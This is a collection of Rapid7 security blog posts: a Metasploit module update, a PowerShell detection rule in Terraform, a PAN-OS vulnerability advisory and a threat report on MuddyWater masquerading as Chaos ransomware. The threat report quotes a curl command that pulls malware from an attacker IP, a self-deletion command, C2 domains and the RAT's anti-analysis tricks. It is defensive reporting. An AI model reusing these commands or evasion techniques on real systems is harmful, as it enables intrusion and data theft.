Normal view

There are new articles available, click to refresh the page.
Today — 12 May 2026Rapid7 Cybersecurity Blog

Final Countdown: Last Chance to Join the Rapid7 Global Cybersecurity Summit

11 May 2026 at 08:54

The Rapid7 2026 Global Cybersecurity Summit is just around the corner, and with it, a final opportunity to join the conversations shaping how security teams are adapting to a rapidly changing landscape.

Over the past few weeks, we’ve shared a preview of what to expect, from the sessions and speakers to the themes running across the agenda. What has become increasingly clear is how closely these topics are connected. Security teams are being asked to move beyond reacting to incidents and instead understand how attacks begin, how they evolve, and how decisions can be made earlier with greater confidence.

What you will gain from attending

Across two days, the summit is structured to reflect how security teams actually operate. The first day builds a shared understanding of how the threat landscape has shifted, while the second day offers more focused sessions tailored to both leaders and practitioners.

Sessions such as The Reality of Running a SOC in 2026 and Inside the Modern SOC explore how attacks unfold in practice, following signals from initial access through to response. These discussions highlight how analysts interpret activity across identity, cloud, and endpoint environments, and how decisions are made when multiple signals compete for attention.

Other sessions, including Beyond the Vulnerability List and From Cloud Exposure to Runtime Attack, focus on how exposure is changing the way teams prioritize risk. The emphasis is on understanding context and how exposed assets actually are to attackers, helping teams determine which issues are most likely to lead to impact and where effort should be focused.

Alongside this, sessions like The AI Dilemma: Automating Defense Without Surrendering Judgment examine how AI is being applied within SOC workflows. The discussion moves beyond theory and looks at how teams are balancing automation with human oversight, ensuring that speed does not come at the expense of trust or accountability.

What’s changing for security teams right now

Security operations are evolving in response to changes in both attacker behavior and organizational complexity. Environments are more distributed, signals are more fragmented, and the time available to respond continues to shrink.

As a result, the focus is shifting toward earlier action, better prioritization, and more connected decision-making. This means linking exposure with detection, reducing unnecessary noise, and building workflows that allow teams to act with clarity when it matters most.

Across the summit, these ideas are explored from multiple perspectives, but they consistently point toward the same outcome. Teams that can connect context, visibility, and response are better positioned to reduce risk before it becomes an incident.

Secure your place

With the event approaching, this is the final opportunity to register and take part in these discussions. Whether you are responsible for strategy, operations, or day-to-day detection and response, the summit is designed to provide practical insights that can be applied immediately.

Join us on May 12–13 and see how security teams are putting these approaches into practice across real environments.

Register now

Before yesterdayRapid7 Cybersecurity Blog

Metasploit Wrap-Up 05/08/2026

Spring cleanup

This week’s Metasploit updates focused on foundational improvements and expanded target reach. Key enhancements were made to the recently released Copy Fail exploit module, which now benefits from payload fixes in linux/x64/exec and linux/armle/exec. These changes expand its capability, enabling the use of the cmd/unix/python/meterpreter/reverse_tcp payload on x64 targets and introducing support for ARMLE Linux. Additionally, the exploit/multi/http/shiro_rememberme_v124_deserialize module has been improved to allow operators to adjust the deserialization chain, enabling exploitation of a broader set of targets. Finally, several critical utility modules, including the FTP anonymous scanner and other FTP modules, received general fixes and updates.

New module content (1)

Anonymous FTP Access Detection

Authors: Matteo Cantoni goony@nothink.org and g0tmi1k

Type: Auxiliary

Pull request: #21372 contributed by g0tmi1k

Path: scanner/ftp/ftp_anonymous

AttackerKB reference: CVE-1999-0497

Description: This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.

Enhanced Modules (2)

Modules which have either been enhanced, or renamed:

  • #21410 from inkognitobo - This improves the exploit/multi/http/shiro_rememberme_v124_deserialize module by adding a JAVA_GADGET_CHAIN datastore option that allows the operator to adjust the chain used for deserialization. This enables the module to exploit additional targets.
  • #21404 from zeroSteiner - This extends the support of Copy Fail to ARMLE Linux targets.

Enhancements and features (4)

  • #21342 from adfoster-r7 - Defers the loading of some dependencies to improve console boot time.
  • #21372 from g0tmi1k - This updates the FTP anonymous scanner module. Key changes include moving the module to align with other generic FTP modules, adding and updating CVE references and documentation notes, and cleaning up the output to be more verbose. Additionally, the module now reports service and vulnerability data to the database and stores proof-of-exploitation info in the loot upon a successful run.
  • #21380 from g0tmi1k - Updates multiple FTP modules to now register FTP service information in the database when successfully connecting to an FTP service.
  • #21418 from kx7m2qd - This improves the platform-agnostic library used to obtain the OS architecture with support for shell sessions on Linux, BSD and Mac OSX.

Bugs fixed (5)

  • #21314 from g0tmi1k - Fixes a crash when running the scanner/http/trace module with the database enabled and a vulnerability was reported.
  • #21411 from zeroSteiner - This fixes a bug in the linux/x64/exec payload that was caused by the CMD datastore option being placed in the assembly source without being escaped.
  • #21413 from tart0ru5 - Fixes a logic error in the exploits/linux/http/projectsend_unauth_rce module that incorrectly checked if a new user has been created.
  • #21421 from adfoster-r7 - This adds extra validation to report_vuln and delete_vuln in Msf::DBManager::Vuln to make sure required fields are present and avoid a crash.
  • #21425 from g0tmi1k - Fixes a bug when parsing FTP server responses.

Documentation

You can find the latest Metasploit documentation on our docsite at docs.metasploit.com.

Get it

As always, you can update to the latest Metasploit Framework with msfupdate and you can get more details on the changes since the last blog post from GitHub:

If you are a git user, you can clone the Metasploit Framework repo (master branch) for the latest. To install fresh without using git, you can use the open-source-only Nightly Installers or the commercial edition Metasploit Pro

Zero Chaos: Scaling Detection Engineering at the Speed of Software, with Detection As Code

8 May 2026 at 08:37

Every engineering team in your organization ships code through a pipeline. They branch, test, review, and deploy. If something breaks, they roll back. If someone asks "what changed?", the answer is in the commit history. This isn't heroic discipline to process; it's just how software gets built.

Now think about how your detection engineering team works.

Rules get written in a UI. Maybe copied and pasted from a wiki. There's no peer review; someone clicks "save," and it's live. No test cases validate the logic before deployment. No rollback if something breaks. When an alert suddenly floods your SOC, good luck figuring out what changed and when. When a detection stops firing, you might not notice for weeks.

This is, by definition, a process gap. And it's one that the rest of engineering solved years ago. The gap becomes manageable through the five custom rules, listed below. As your detections grow, you need the same discipline that every other engineering team already has.

Process Stage

How it works in software engineering

How it works in detection engineering

Storage

Git / Version Control

UI / Wiki / "Tribal Knowledge"

Validation

Automated CI/CD Tests

"Wait and see if it fires"

Review

Peer-reviewed Pull Requests

Single-user "Save" button

Rollback

One-click git revert

Manual query deletion

How does this help my security team?

Detection as Code gives your team a structured, repeatable way to build and manage detections with confidence. Instead of relying on manual updates and guesswork, every change is tested, reviewed, and tracked before it reaches production. Before we get into the how, here's why Detection as Code changes the way your team works:

  • A more reliable process. Every change goes through version control and peer review before it goes live. When something goes wrong, you know exactly what changed, when it changed, and who approved it. Roll back in seconds if needed.

  • A safety net of tests. Inline test cases validate detection logic before deployment. Positive tests prove it catches the threat; negative tests prove it doesn't fire on legitimate activity.

  • Confidence in what's deployed. terraform plan previews every change before anything touches production. Terraform state is the authoritative record of your detection estate, not some spreadsheet.

The result is a detection workflow your team can trust. Changes are predictable, validated, and fully traceable, so security teams don’t get caught up in troubleshooting and can focus on improving coverage and overall posture. 

The anatomy of a detection

Here is what a detection rule looks like using Rapid7’s Terraform provider. It offers a practical view of how detection engineering teams can use Detection as Code in practice:

resource "rapid7_siem_detection_rule" "encoded_powershell" {
  name        = "Encoded PowerShell Command Execution"
description = "Detects PowerShell launched with base64-encoded commands"
techniques  = ["T1059.001"]
  action   = "CREATES_ALERTS"
priority = "HIGH"
logic = {
    leql = <<-LEQL
      from(event_type = process_start_event)
      where(
        (process.exe_path = /.*\\powershell\.exe$/i
         OR process.exe_path = /.*\\pwsh\.exe$/i)
        AND process.cmd_line ICONTAINS " -e"
AND process.cmd_line ICONTAINS-ANY [
" JAB", " SUVYI", " SQBFAFgA", " aWV4I"
]
      )
    LEQL
    testcases = [
      {
        matches = true
        payload = jsonencode({
          process = {
            exe_path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
cmd_line = "powershell.exe -ep bypass -e JABjAGwAaQBlAG4AdAA="
}
        })
      },
      {
        matches = false
        payload = jsonencode({
          process = {
            exe_path = "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe"
cmd_line = "powershell.exe -File C:\\Scripts\\backup.ps1"
}
        })
      }
    ]
  }
}

Why this works:

  1. Version-controlled logic: The LEQL query defines the threat logic in a text format that Git can track.

  2. MITRE ATT&CK® untegration: The techniques field ensures your coverage map updates automatically.

  3. Inline testing: We aren't just deploying a query, but a validated unit of logic. The pipeline won't let this reach production if the logic fails to fire on the matching" payload or accidentally fires on the un-matching payload.

Why Terraform?

Because it's the industry standard for managing infrastructure as code. We didn't invent a proprietary CLI; we built on the tool that thousands of platform teams already run daily. If your organization uses Terraform for cloud infrastructure, your detection engineers now use the same tool, the same workflow, and the same review process.

Governance happens naturally in this model. Open a pull request. Your team sees the logic, the test cases, and the expected behavior. They comment, suggest improvements, and approve. Every change is traceable in your commit history. This isn't a separate compliance exercise bolted onto your workflow. It is the workflow.

Already have rules built in the UI? One command imports them all:

terraform query -generate-config-out imports.tf

AI-assisted detection writing

The quick-start repo ships with IDE configurations for Claude Code, Cursor, VS Code Copilot, and Kiro. These configs give your AI assistant full context on the Terraform provider schema, LEQL syntax, and MITRE ATT&CK mappings.

In practice: open your editor, describe a threat in plain English, such as ‘write me a detection for lateral movement via RDP from non-admin workstations,’ and get back a complete Terraform resource ready for review. The AI accelerates the engineer; it doesn't replace them. The time from "I need a detection" to "this is ready for review" drops from hours to minutes.

Start building detections as code today

Rapid7’s Terraform provider for Detection as Code is now available across all Incident Command and InsightIDR tiers.

To get to work, use the Getting Started guide for a walkthrough as you setup, authenticate, and run your first deployment. Clone the quick-start template, run terraform plan, and see your detection estate as code.
For more information on Incident Command, visit Our hub page for SIEM.

Rapid7 and OpenAI: Helping Defenders Move at Machine Speed

7 May 2026 at 16:00

Wade Woolwine is Senior Director, Product Security at Rapid7.

Announcing OpenAI's Trusted Access for Cyber program

CIOs and CISOs are telling us the same thing in different ways: Advances in frontier AI are accelerating the threat environment and putting pressure on security operating models built for a different pace. Vulnerabilities can be discovered faster, exploitation windows are shrinking, and attackers are increasingly using automation to move with greater speed and scale. For defenders, this changes the value equation. The premium is no longer only on detecting threats faster after they emerge, but on moving earlier: Reducing exposure, validating risk, strengthening detection, and remediating at scale before attackers can take advantage.

This is why Rapid7 is excited to be included in OpenAI’s Trusted Access for Cyber program and their announcement today. OpenAI’s approach recognizes that advanced AI can help verified security teams move faster on legitimate defensive work, from triage and detection to validation, patching, malware analysis, and detection engineering. It also recognizes that some specialized cyber workflows require stronger verification, monitoring, and feedback loops.

As Corey Thomas, CEO of Rapid7, shared:

“Security leaders are under pressure from every direction: More vulnerabilities, faster exploitation, and increasing business pressure. Through OpenAI’s Trusted Access for Cyber program, Rapid7 is exploring more ways to accelerate the shift from reactive to preemptive security. To stay ahead of attackers, defenders must proactively reduce exploitability and detect with machine-scale speed and precision. We’re working with OpenAI to equip security teams with advanced capabilities that will meaningfully improve their cyber resilience.”

AI in security: Not just faster discovery

For Rapid7, this moment is about more than faster vulnerability discovery. AI is creating new pressure across the entire security lifecycle, from vulnerability validation, prioritization, disclosure, and remediation to threat and exploitation detection. Security infrastructure built for human-speed discovery now needs to operate in a machine-speed world, with enough context, governance, and accountability to help defenders act with confidence.

Finding risk is only the beginning. Security teams need to understand which vulnerabilities and misconfigurations are truly exploitable, which systems and business services are affected, what compensating controls are in place, how remediation should be prioritized, and where detection coverage is needed. CISOs also need confidence that advanced AI is being applied responsibly, with clear guardrails, measurable outcomes, and accountability.

Our work with OpenAI will help us explore how frontier AI can strengthen three critical areas. First, it can support the identification of vulnerabilities in our own products and code earlier in the development lifecycle. By accelerating secure code review, surfacing risky patterns, supporting root cause analysis, reviewing patches, and giving engineering teams faster feedback, AI can help reduce risk before issues reach production.

Second, it can advance vulnerability research and exploitation analysis. Rapid7 has long-standing expertise in vulnerability intelligence, exploitability research, and offensive security with Rapid7 Labs. Frontier AI can help researchers reason across unfamiliar code, map affected surfaces, build safe reproduction harnesses, validate severity, and turn findings into practical remediation guidance.

Third, it can expand AI-driven red-teaming. As AI becomes more embedded in enterprise systems and security operations, it must also be tested adversarially. We see an opportunity to use AI to strengthen red-team workflows, explore attack paths, validate controls, and help defenders understand where exposure could become real-world risk.

Artificial intelligence in use at Rapid7

We are already seeing this potential inside our own security operations work. In support of our Agentic SOC initiatives, Rapid7 has designed and implemented a system that uses machine learning to surface threat- and risk-relevant events from raw log and telemetry data. By using frontier AI models, including OpenAI’s GPT-5.5, to support initial triage and escalate only relevant events to SOC analysts, we have seen a 25% reduction in time spent chasing false-positive events in the queue.

This is not about replacing human expertise. It is about giving defenders better leverage in a world where attackers, businesses, and technology are all moving faster. The shift from reactive to preemptive security, and from human-scale processes to machine-scale defense, is not a marketing reframe. It is becoming the only viable path for teams that need to anticipate where attackers will move next, prioritize the exposures that actually matter, and respond at the speed of modern attacks.

AI may accelerate discovery, but cyber resilience depends on what happens after discovery. Customers need to unify their data, apply AI with the right context, drive remediation at scale, and translate security activity into measurable outcomes. That is where Rapid7 is focused. Across the Command Platform, Rapid7’s AI capabilities are built to help security teams detect threats and anomalies at scale, reduce noise, optimize SOC workflows, and make faster, more confident decisions.

By unifying Exposure Management and Detection and Response on the Command Platform, and combining AI-driven operations with the depth of expertise we have built over 25 years, Rapid7 is giving customers a more coherent way to reduce risk, disrupt attackers, and build durable cyber resilience. Learn more about Rapid7’s AI capabilities.

Why Security in 2026 Requires Continuous Threat and Exposure Management (CTEM) at Scale

7 May 2026 at 09:00

Let's be honest, the patching window just shrank to something no practitioner or organization can keep up with. Organizations now need to operate in an environment that must assume breach, which means fundamentals like attack surface management, micro-segmentation, identity management, and attack path validation – aka a few core pillars of CTEM – just became the most important initiatives within the cybersecurity department. Rapid7 is the only vendor that provides a truly unified platform to master Continuous Threat Exposure Management (CTEM).

How Rapid7 satisfies all 5 steps of the CTEM Framework

Steps 1 and 2: Scoping and Discovery

Achieving full visibility

Rapid7 eliminates "unknown unknowns" by providing line-of-sight into 100% of your hybrid attack surface.

  • Surface Command (CAASM): We establish a single source of truth by unifying asset and identity inventory from over 200 third-party vendors and native sources.

  • Vulnerability Management: Our full-stack active scanning discovers shadow IT hidden within your enterprise network.

  • External Attack Surface Management (EASM): We scan the entire IPv4 space of the internet to automatically track changes to registered domains and public networks so you can map your external kingdom.

  • Unified CNAPP (Cloud Security): Our platform provides real-time, agentless visibility into every resource running across your multi-cloud environment (AWS, Azure, GCP, and Kubernetes). Through Event-Driven Harvesting (EDH), we identify infrastructure changes in under 60 seconds. This allows us to map not just the assets, but the complex identities and permissions that define your cloud risk.

Step 3: Prioritization

Moving beyond static scores

We replace generic risk scores with Active Risk and Threat-Aware Context. Our platform automatically prioritizes vulnerabilities based on real-world exploitability data from Rapid7 Labs and the Exploit Prediction Scoring System (EPSS). We are also able to incorporate your own organization’s tagging infrastructure to properly contextualize your enterprise so you focus on what matters most. 

Step 4: Validation

Continuous human-led red teaming 

This is where Rapid7 truly stands apart from automated-only vendors or point-in-time pen tests. Vector Command provides the expert human logic needed to bypass compensating controls like WAFs that stop automated tools cold. This gives Rapid7 the ability to answer the question: “How would an attacker get in?” We fully map the attack chain from the external to the internal so you have insight into where your controls are weakest.
Ed Montgomery at Rapid7 has written extensively about the power of Vector Command – you can find his blogs here.
Here’s a sampling of a couple of those stories: 

  • The Telerik UI Example: While a scanner flags an old version of Telerik, our operators discovered they could bypass a WAF by splitting a malicious payload into 118 individual, "harmless" fragments. We bypassed the WAF and this achieved full remote code execution that a time-boxed, two-week pentest would never have uncovered. An automated scan might have flagged the outdated telerik as something notable but it was really the configuration of the WAF that allowed us to bypass. Something an automated scan would never have found. 

  • SaaS Phishing: Our team used a misconfigured public Jira instance that allowed self-registration to hijack an Office 365 session and move laterally through internal trust. This validated that the true risk was a SaaS misconfiguration, not a patchable CVE.

Step 5: Mobilization

Instant response and remediation 

We don't just find problems; we close the loop with integrated action.

  • Cloud Runtime Security (CADR): Powered by our partnership with ARMO, our eBPF-based sensor can shut down an attack in seconds by killing malicious processes or pausing containers at the moment of detection.

  • Automation (SOAR): InsightConnect and our "Bot Factory" in CNAPP trigger automated remediation workflows to lock down S3 buckets or disable compromised users instantly.

  • Remediation Hub: We provide a centralized, vendor agnostic action-driven list of prioritized fixes to coordinate seamlessly with IT teams.

CTEM-rapid7-framework.png

The new standard: From weeks to minutes

If your CTEM strategy relies on static tools and annual checkboxes, you are not just behind the curve. You are operating in a completely different era. By unifying the full visibility of Surface Command with the critical thinking of Vector Command and the instant response of our Cloud Runtime capabilities, Rapid7 empowers you to take command of your attack surface.

Do not wait for a 118 single bit request bypass to prove your defenses are porous. Move from a posture of passive observation to one of preemptive security.

Critical Buffer Overflow in Palo Alto Networks PAN-OS User-ID Authentication Portal (CVE-2026-0300)

6 May 2026 at 09:27

Overview

On May 6, 2026, Palo Alto Networks published a security advisory for CVE-2026-0300, a critical unauthenticated buffer overflow vulnerability affecting PAN-OS PA-Series and VM-Series firewall appliances. Prisma Access, Cloud NGFW, and Panorama appliances are not affected by this vulnerability. The vulnerability carries a CVSSv4 score of 9.3 and has been confirmed as exploited in the wild by the vendor.

CVE-2026-0300 is a buffer overflow (CWE-787) in the User-ID™ Authentication Portal (also known as Captive Portal), a non-default PAN-OS feature used to map IP addresses to usernames. An unauthenticated remote attacker can exploit this vulnerability by sending specially crafted packets to a device with the Authentication Portal enabled, achieving arbitrary code execution with root privileges on the affected firewall. No authentication or user interaction is required.

Palo Alto Networks has confirmed limited exploitation in the wild targeting Authentication Portals exposed to either untrusted IP addresses or the public internet. No patches are currently available; fixed versions are expected to begin rolling out on May 13, 2026, with additional releases through May 28, 2026.

PAN-OS is among the most widely deployed enterprise firewall operating systems in the world. Shodan identifies approximately 225,000 internet-facing PAN-OS instances, representing a significant attack surface. Rapid7 strongly urges all organizations running affected PAN-OS versions with the User-ID Authentication Portal enabled to apply the available workarounds immediately and prioritize patching as soon as fixed versions become available.

Update #1: On May 6, 2026, CVE-2026-0300 was added to the U.S. Cybersecurity and Infrastructure Security Agency's (CISA) list of known exploited vulnerabilities (KEV), based on evidence of active exploitation. Palo Alto Networks Unit 42 also published a threat brief attributing observed exploitation to CL-STA-1132, a likely state-sponsored threat cluster that deployed open-source tunneling tools and conducted Active Directory enumeration following initial compromise.

Mitigation guidance

Organizations running PA-Series and VM-Series firewalls with the User-ID™ Authentication Portal enabled should apply the available workarounds immediately and prioritize patching as soon as fixed versions are released. Check the official documentation to establish whether the affected User-ID™ Authentication Portal is currently enabled.

According to the Palo Alto Networks advisory, the following versions are affected by CVE-2026-0300:

Product

Affected

Unaffected

Fix ETA

PAN-OS 12.1

< 12.1.4-h5

< 12.1.7

>= 12.1.4-h5

>= 12.1.7

05/13

05/28

PAN-OS 11.2

< 11.2.4-h17

< 11.2.7-h13

< 11.2.10-h6

< 11.2.12

>= 11.2.4-h17

>= 11.2.7-h13

>= 11.2.10-h6

>= 11.2.12

05/28

05/13

05/13

05/28

PAN-OS 11.1

< 11.1.4-h33

< 11.1.6-h32

< 11.1.7-h6

< 11.1.10-h25

< 11.1.13-h5

< 11.1.15

>= 11.1.4-h33

>= 11.1.6-h32

>= 11.1.7-h6

>= 11.1.10-h25

>= 11.1.13-h5

>= 11.1.15

05/13

05/13

05/28

05/13

05/13

05/28

PAN-OS 10.2

< 10.2.7-h34

< 10.2.10-h36

< 10.2.13-h21

< 10.2.16-h7

< 10.2.18-h6

>= 10.2.7-h34

>= 10.2.10-h36

>= 10.2.13-h21

>= 10.2.16-h7

>= 10.2.18-h6

05/28

05/13

05/28

05/28

05/13

Until patches are available, Palo Alto Networks recommends one of the following workarounds:

  • Restrict User-ID™ Authentication Portal access to only trusted internal zones. Refer to Step 6 of the Live Community article and the Knowledgebase article for instructions on restricting access.

  • Disable User-ID™ Authentication Portal entirely if it is not required (Device > User Identification > Authentication Portal Settings > uncheck Enable Authentication Portal).

Please refer to the vendor advisory for the latest guidance.

Rapid7 customers

Exposure Command, InsightVM, and Nexpose

Exposure Command, InsightVM, and Nexpose customers can assess exposure to CVE-2026-0300 with authenticated vulnerability checks available in the May 6th, 2026 content release.

Updates

  • May 6, 2026: Initial publication.

  • May 7, 2026: Updated overview to note the addition to CISA KEV and the Unit 42 threat brief attributing exploitation to CL-STA-1132.

Muddying the Tracks: The State-Sponsored Shadow Behind Chaos Ransomware

Executive summary

In early 2026, a sophisticated intrusion initially appearing to be a standard Chaos ransomware attack was assessed to be consistent with a targeted state-sponsored operation. While the threat actor operated under the banner of the Chaos ransomware-as-a-service (RaaS) group, forensic analysis revealed the incident was a "false flag" masquerade. Technical artifacts, including a specific code-signing certificate and Command-and-Control (C2) infrastructure, suggest with moderate confidence that this activity is linked to MuddyWater (Seedworm), an Iranian Advanced Persistent Threat (APT) affiliated with the Ministry of Intelligence and Security (MOIS).

The campaign was characterized by a high-touch social engineering phase conducted via Microsoft Teams, where the attackers utilized interactive screen-sharing to harvest credentials and manipulate Multi-Factor Authentication (MFA). Once inside, the group bypassed traditional ransomware workflows, forgoing file encryption in favor of data exfiltration and long-term persistence via remote management tools like DWAgent. This report deconstructs the infection chain and analyzes the custom "Game.exe" Remote Access Trojan (RAT).

Additionally, this explores the process by which MuddyWater is increasingly leveraging the cybercriminal ecosystem to provide plausible deniability for geopolitical espionage and prepositioning, particularly in the US. The strategy highlights the convergence between state-sponsored intrusion activity and criminal tradecraft, where a big “tell” lies in the techniques that were deployed – and those that weren’t.

This overall strategy suggests the primary goal was not financial gain. It is also further proof of the lines blurring against the background of geopolitical tensions, and that attribution is becoming more difficult if teams do not take it upon themselves to conduct proper and thorough research.

Rapid7 coverage

Rapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s Intelligence Hub, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization. Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.

Chaos ransomware: Profile and targeting

Active since February 2025, Chaos is a ransomware-as-a-service (RaaS) operation specializing in big-game hunting (BGH) attacks against high-profile organizations, with reported ransom demands reaching up to $300,000. Despite the name, it is distinct from the Chaos malware builder identified in 2021. The group emerged shortly after the July 2025 law enforcement disruption of BlackSuit infrastructure during Operation Checkmate and is likely composed of former BlackSuit and/or Royal members. To expand its operations, Chaos advertises its affiliate program on cybercrime forums, such as RAMP (prior to its takedown) and RehubCom.

Chaos relies heavily on social engineering and remote access abuse to gain initial access. Rapid7 observed techniques that include spam email flooding combined with voice-based phishing (vishing), often involving impersonation of IT support personnel. Chaos then persuades victims to grant remote access via legitimate tools such as Microsoft Quick Assist, allowing operators to establish an initial foothold.

In line with common ransomware practices, Chaos typically employs double extortion, exfiltrating sensitive data prior to encryption and threatening public disclosure via its data leak site (DLS). The group has also demonstrated triple extortion by threatening distributed denial-of-service (DDoS) attacks against the victim's infrastructure. These capabilities are reportedly offered to affiliates as part of bundled services, representing a notable feature of its RaaS model. Additionally, Chaos has been observed leveraging elements of quadruple extortion, including threats to contact customers or competitors to increase pressure on victims.

A distinguishing characteristic of the group’s DLS is the use of a “blind” countdown timer, which withholds the victim’s identity until expiration, likely intended to accelerate negotiations (Figure 1). As of late March 2026, Chaos has claimed 36 victims and maintained a consistent operational tempo (Figure 2). The group predominantly targets organizations in the United States, with a particular focus on the construction, manufacturing, and business services sectors (Figure 3).

Chaos-DLS-screenshot.png
Figure 1: Screenshot from Chaos’ DLS

chart-claimed-victims.png
Figure 2: Number of claimed victims over time

geographic-victim-distribution.png
Figure 3: Geographic victim distribution

Incident overview

The intrusion that Rapid7 investigated began with a targeted social engineering campaign leveraging Microsoft Teams, where the threat actor (TA) engaged employees through external chat requests. By operating interactively through compromised users, the attacker conducted initial discovery, harvested credentials, including MFA manipulation, and quickly transitioned to using legitimate accounts for internal access.

From there, the TA established persistence using remote access tools such as DWAgent and AnyDesk, before deploying additional payloads and further control of the environment. Following this, the TA exfiltrated data from the compromised environment and subsequently contacted the victim via email, claiming data theft and initiating ransom negotiations (Figure 4).

 

FixedDiagram.jpg
Figure 4: Incident breakdown

Initial Access via social engineering and remote interaction

The TA achieved initial access through social engineering conducted via Microsoft Teams, where they initiated one-on-one chats with users from a controlled account. During these interactions, the TA established screen-sharing sessions, gaining direct visibility and interactive access to user assets.

While connected, the TA executed basic discovery commands, accessed files related to the victim’s VPN configuration, and instructed users to enter their credentials into locally created text files. In at least one instance, the TA deployed a remote management tool (AnyDesk) to further facilitate access.

ipconfig /all
nslookup
net start
whoami
ping

Figure 5: Discovery commands executed by the TA

Credential harvesting and account compromise

A key component of the intrusion involved interactive credential harvesting: The TA explicitly instructed victims to enter credentials into locally created text files (credentials.txt, cred.txt) and to modify MFA configurations to include attacker-controlled devices.

Additionally, Rapid7’s analysis of browser artifacts revealed access to the URL hxxps[://]adm-pulse[.]com/verify.php.

The URL mimicked a Quick Assist themed phishing page, indicating credential harvesting through impersonation.

Establishing initial foothold and remote access

Following credential compromise, the TA authenticated to internal systems, including a Domain Controller, using multiple compromised accounts. They then established persistent remote access through RDP sessions and deployment of the remote management tool DWAgent. The DWAgent installation chain included:

File name

Description

dwagent.exe

Remote access tool

pythonw.exe

Cmd version of python interpreter

dwagsvc.exe

DWAgent service

dwaglnc.exe

Background component of DWAgent

Table 1: Files observed during installation of DWAgent

Payload delivery and execution

The TA later executed commands via RDP to download additional payloads using curl:

curl hxxp[://]172.86.126[.]208:443/ms_upd.exe -o C:\ProgramData\ms_upd.exe

After the download, the TA executed the binary ms_upd.exe, initiating a multi-stage infection chain. 

Upon successful execution, ms_upd.exe downloaded additional components:

File name

SHA256

Description

WebView2Loader.dll

a47cd0dc12f0152d8f05b79e5c86bac9231f621db7b0e90a32f87b98b4e82f3a

Legitimate DLL

Game.exe

1319d474d19eb386841732c728acf0c5fe64aa135101c6ceee1bd0369ecf97b6

Backdoor granting the TA access to the infected machine

visualwincomp.txt

c86ab27100f2a2939ac0d4a8af511f0a1a8116ba856100aae03bc2ad6cb0f1e0

Encrypted configuration

Table 2: Components downloaded by ms_upd.exe

Lateral movement 

The TA expanded access within the environment by leveraging compromised accounts and establishing remote access channels. They used RDP sessions to move between systems, allowing them to operate interactively and access additional resources within the network.

Extortion activity and data leak claims

The TA distributed emails to multiple users, alleging successful data exfiltration, and provided a .onion link for negotiation. Open-source intelligence (OSINT) collection identified a corresponding entry on the Chaos DLS referencing data; however, all identifying details were redacted, as per the group’s typical “blind” countdown timer. 

A subsequent email introduced a new contact address and instructed recipients to locate a note allegedly placed within their Desktop directory containing “access credentials” for a secure chat. Rapid7 conducted a threat hunt across all assets that focused on files created or accessed within Desktop directories and subdirectories and did not identify any artifacts consistent with the TA’s claims. The victim further validated the affected user systems and confirmed the absence of such files. Despite these inconsistencies in the initial proof-of-compromise, the TA later published the stolen data on its DLS in line with modern extortion tactics. The victim confirmed that the leaked data was legitimate.

Malware analysis

ms_upd.exe 

The binary functions as a downloader that begins by collecting basic host information, including computer name, username, and domain. This data is used to generate a unique client identifier, concatenating computer name, username, and tick count, which is sent to the C2 server moonzonet[.]com via a /register request, followed by periodic /check requests to determine the execution flow.

Based on the C2 response, the malware either proceeds when receiving an “approved” status or retries registration, if instructed. Once approved, it reports a “downloading” status and prepares a working directory under the user’s Downloads folder (falling back to C:\Users\Public\Downloads if necessary).

The dropper then retrieves three payload components from the C2:

  • Game.dll (saved as WebView2Loader.dll)

  • Game.exe

  • Game.config (saved as visualwincomp.txt)

If all downloads succeed, the malware reports a “running” status and executes the primary payload - Game.exe. Execution success is monitored, with the result communicated back to the C2 as either “success” or “error”. Upon successful execution, the dropper triggers a self-deletion routine via a delayed command cmd.exe /c ping 127.0.0.1 -n 6 > nul && del /f /q \"%s\".

ms-upd-main-function-snippet.png
Figure 6: Snippet from the main function of ms_upd.exe

As seen in Figure 6, the malware doesn’t use any form of obfuscation to hide its purpose - API imports are statically resolved, and strings are stored in a plaintext form. This simplicity suggests the tool was likely developed for limited or single-use deployment.

At the time of writing, only two samples have been observed in public repositories, both exhibiting identical functionality.

Game.exe

Game.exe is a custom RAT that masquerades as a legitimate Microsoft WebView2 application. Analysis of the binary's PDB path C:\Users\pc\Downloads\WebView2Samples-main\WebView2Samples-main\SampleApps\WebView2APISample\Release\x64\WebView2APISample.pdb confirms that the developer trojanized the official Microsoft WebView2APISample project: https://github.com/MicrosoftEdge/WebView2Samples/tree/main/SampleApps/WebView2APISample

The malware deviates from the dropper in a way that it implements some obfuscation and anti analysis techniques: 

ATT&CK ID

Technique

Purpose

Example

T1027.007

Dynamic API and DLL resolution

Hide the malware functionality

Usage of LoadLibraryA() and GetProcAddress() APIs

T1027

String Obfuscation

Hide sensitive strings from AV solutions

Names of DLLs, APIs, registry paths

T1497.001

Sandbox Detection

Search for known analysis-related DLLs that are loaded into the current process

sbiedll.dll, dbghelp.dll, api_log.dll, vmcheck.dll,  wpespy.dll

T1497.001

Virtual Machine Detection via CPU

Compare the processor name string against a list of virtualization-related keywords

Virtual, VMWare, KVM, Hyper-V

T1082 

Removable Drive Enumeration

Enumerate logical drives and check if any removable drives are present

Usage of GetLogicalDrives() and GetDriveTypesA() to enumerate logical drives and compare their type against DRIVE_REMOVABLE

T1497.003 

Sleep / Timing Check

Identify sandbox time-skipping mechanisms or identify hooked timing APIs

GetTickCount() followed by Sleep(1000) and another GetTickCount() to verify if approximately one second elapsed

Table 3: Anti analysis / anti detection techniques used by Game.exe

If the malware does not detect an analysis environment,, it establishes persistence by self-installing into a randomized directory under C:\ProgramData\visualwincomp-<random>\, where it copies itself alongside a legitimate WebView2Loader.dll and an encrypted configuration file, visualwincomp.txt.

Additionally, the malware enforces single execution on an infected host by registering the mutex ATTRIBUTES_ObjectKernel.

